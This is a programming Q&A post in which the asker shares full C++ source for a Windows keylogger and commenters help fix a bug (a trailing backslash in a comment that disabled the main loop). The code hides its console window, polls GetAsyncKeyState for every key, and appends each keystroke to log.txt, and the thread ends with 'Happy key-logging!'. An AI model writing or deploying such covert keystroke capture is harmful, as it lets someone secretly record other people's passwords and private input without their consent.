# C++ - Iterating over all VK_ for GetAsyncKeyState

Tags: c++, loops

I wrote thiw little routine:

```
int main()
{
  HideWindow();  
  writeTime();

  char i;

  while (1)
  {
    Sleep(50);
    for(i = 8; i <= 190; i++)
    {
        if (GetAsyncKeyState(i) == -32767) cout << "Key pressed";
    }
  }
  //system("PAUSE");
  return 0; 
}
```

The Compiler tells me (of course) that the for-routine is always true, because i can only reach 127 (char = 1 Byte).
But if I'm using an int

```
int i;
...
for (i = 8; i<= 190; i++)
{
    ...
}
```

I'm not getting an error, the program just goes into the for-routine once and then exits the while-routine.

Is there a way to iterate over all VK_ ?
http://msdn.microsoft.com/en-us/library/windows/desktop/ms646293%28v=vs.85%29.aspx

EDIT: Whole Code

```
#include <iostream>
#include <windows.h>
#include <winuser.h>
#include <time.h>

using namespace std;

int save(int key_stroke, char *file);
void HideWindow();
void writeTime();

int main()
{
  HideWindow();  
  writeTime();

  int i;

  //******SCHLEIFE******\\
  while (1)
  {
      Sleep(50);
      for(i = 8; i <= 190; i++)
      {
          if (GetAsyncKeyState(i) == -32767) save(i,"log.txt");
      }
  }
  //system("PAUSE");
  return 0;
}

int save(int key_stroke, char *file)
{
  if ( (key_stroke == 1) || (key_stroke == 2) ) return 0;

  FILE *OUTPUT_FILE;
  OUTPUT_FILE = fopen(file, "a+");
  switch(key_stroke)
  {
  case          8: fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]"); break;
  case         13: fprintf(OUTPUT_FILE, "%s", "\n[ENTER]"); break;
  case         32: fprintf(OUTPUT_FILE, "%s", "\n "); break;
  case        190: fprintf(OUTPUT_FILE, "%s", "."); break;
  case     VK_TAB: fprintf(OUTPUT_FILE, "%s", "[TAB]"); break;
  case   VK_SHIFT: fprintf(OUTPUT_FILE, "%s", "[SHIFT]"); break;
  case VK_CONTROL: fprintf(OUTPUT_FILE, "%s", "[CONTROL]"); break;
  case  VK_ESCAPE: fprintf(OUTPUT_FILE, "%s", "[ESCAPE]\n"); break;
  case     VK_END: fprintf(OUTPUT_FILE, "%s", "[END]"); break;
  case    VK_HOME: fprintf(OUTPUT_FILE, "%s", "[HOME]"); break;
  case    VK_LEFT: fprintf(OUTPUT_FILE, "%s", "[LEFT]"); break;
  case   VK_RIGHT: fprintf(OUTPUT_FILE, "%s", "[RIGHT]"); break;
  case    VK_DOWN: fprintf(OUTPUT_FILE, "%s", "[DOWN]"); break;
  case      VK_UP: fprintf(OUTPUT_FILE, "%s", "[UP]"); break;
  default:         fprintf(OUTPUT_FILE, "%s", &key_stroke);
  }    
  fclose (OUTPUT_FILE);
  return 0;
}

void HideWindow()
{
  HWND hiding;
  AllocConsole();
  hiding = FindWindowA("ConsoleWindowClass", NULL);
  ShowWindow(hiding,0);
}

void writeTime()
{
  time_t actTime;
  time(&actTime);

  FILE *file = fopen("log.txt","a+");
  fprintf(file, "\n%s",ctime(&actTime));
  fclose(file);
}
```

Thanks :)

Comment: Your first code sample, after removing the calls to `HideWindow` and `writeTime`, also making `i` an `int` functions just fine here, looping until I hit ctrl-c or close the window. I've never seen this approach to checking for a keystroke. What are you actually trying to achieve? I feel you could probably get a more satisfactory answer  if we knew that. Currently your questions appears to resemble an XY problem - one in which you ask how to do Y because that seems to be the solution to X, when in fact, stating what X was would result in people telling you to do Z, rather than Y.

Comment: oh thanks, that was a pretty answer ^.^ It worked? :o Well I actually don't want only to check, if a key was pressed, but also what key exactly and write that into a .txt-file.

Comment: You're welcome. If you surround a word with the \` character, as found on the key to the left of the 1/!, then you can highlight it. You're going to laugh at the problem - see the comment you have `//******SCHLEIFE******\\ ` - try changing the \\ to // and tell me what happens.. (Spoiler: the \ character as the last one on a line signifies that the line continues onto the next line. What does that mean? Easy - you inadvertently commented-out the `while(1)` line too!

Comment: :D Wow, good to know! I've never had a that funny problem! Thank you very much! :)

Comment: A pleasure. Happy key-logging! Don't do evil...

Comment: Well I just want to test, if I CAN write a keylogger :) I'm not planning to use it